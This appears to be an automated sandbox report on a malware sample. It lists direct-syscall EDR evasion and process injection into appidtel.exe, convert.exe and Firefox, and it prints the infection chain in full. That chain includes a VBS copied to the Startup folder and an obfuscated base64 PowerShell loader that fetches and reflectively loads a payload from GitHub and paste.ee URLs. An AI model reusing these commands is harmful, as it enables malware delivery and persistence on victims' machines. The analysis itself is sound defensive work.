Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F9730 mov eax, dword ptr fs:[00000030h]	10_2_038F9730
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900750 mov eax, dword ptr fs:[00000030h]	10_2_03900750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942750 mov eax, dword ptr fs:[00000030h]	10_2_03942750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942750 mov eax, dword ptr fs:[00000030h]	10_2_03942750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398E75D mov eax, dword ptr fs:[00000030h]	10_2_0398E75D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03984755 mov eax, dword ptr fs:[00000030h]	10_2_03984755
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913740 mov eax, dword ptr fs:[00000030h]	10_2_03913740
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913740 mov eax, dword ptr fs:[00000030h]	10_2_03913740
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913740 mov eax, dword ptr fs:[00000030h]	10_2_03913740
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D3749 mov eax, dword ptr fs:[00000030h]	10_2_039D3749
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393674D mov esi, dword ptr fs:[00000030h]	10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393674D mov eax, dword ptr fs:[00000030h]	10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393674D mov eax, dword ptr fs:[00000030h]	10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03908770 mov eax, dword ptr fs:[00000030h]	10_2_03908770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h]	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h]	10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904690 mov eax, dword ptr fs:[00000030h]	10_2_03904690
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03904690 mov eax, dword ptr fs:[00000030h]	10_2_03904690
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h]	10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039366B0 mov eax, dword ptr fs:[00000030h]	10_2_039366B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD6AA mov eax, dword ptr fs:[00000030h]	10_2_038FD6AA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD6AA mov eax, dword ptr fs:[00000030h]	10_2_038FD6AA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393C6A6 mov eax, dword ptr fs:[00000030h]	10_2_0393C6A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F76B2 mov eax, dword ptr fs:[00000030h]	10_2_038F76B2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F76B2 mov eax, dword ptr fs:[00000030h]	10_2_038F76B2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F76B2 mov eax, dword ptr fs:[00000030h]	10_2_038F76B2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h]	10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h]	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A6C7 mov ebx, dword ptr fs:[00000030h]	10_2_0393A6C7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393A6C7 mov eax, dword ptr fs:[00000030h]	10_2_0393A6C7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF6C7 mov eax, dword ptr fs:[00000030h]	10_2_039BF6C7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039316CF mov eax, dword ptr fs:[00000030h]	10_2_039316CF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039806F1 mov eax, dword ptr fs:[00000030h]	10_2_039806F1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039806F1 mov eax, dword ptr fs:[00000030h]	10_2_039806F1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BD6F0 mov eax, dword ptr fs:[00000030h]	10_2_039BD6F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D6E0 mov eax, dword ptr fs:[00000030h]	10_2_0392D6E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392D6E0 mov eax, dword ptr fs:[00000030h]	10_2_0392D6E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h]	10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039336EF mov eax, dword ptr fs:[00000030h]	10_2_039336EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03903616 mov eax, dword ptr fs:[00000030h]	10_2_03903616
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03903616 mov eax, dword ptr fs:[00000030h]	10_2_03903616
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942619 mov eax, dword ptr fs:[00000030h]	10_2_03942619
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393F603 mov eax, dword ptr fs:[00000030h]	10_2_0393F603
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03931607 mov eax, dword ptr fs:[00000030h]	10_2_03931607
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h]	10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397E609 mov eax, dword ptr fs:[00000030h]	10_2_0397E609
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF626 mov eax, dword ptr fs:[00000030h]	10_2_038FF626
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF626 mov eax, dword ptr fs:[00000030h]	10_2_038FF626

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\appidtel.exe	Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: NULL target: C:\Windows\SysWOW64\appidtel.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\convert.exe

Thread register set: target process: 1756

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\convert.exe

Thread APC queued: target process: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\appidtel.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\appidtel.exe base: 303A008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.emariehnip.vbs')')
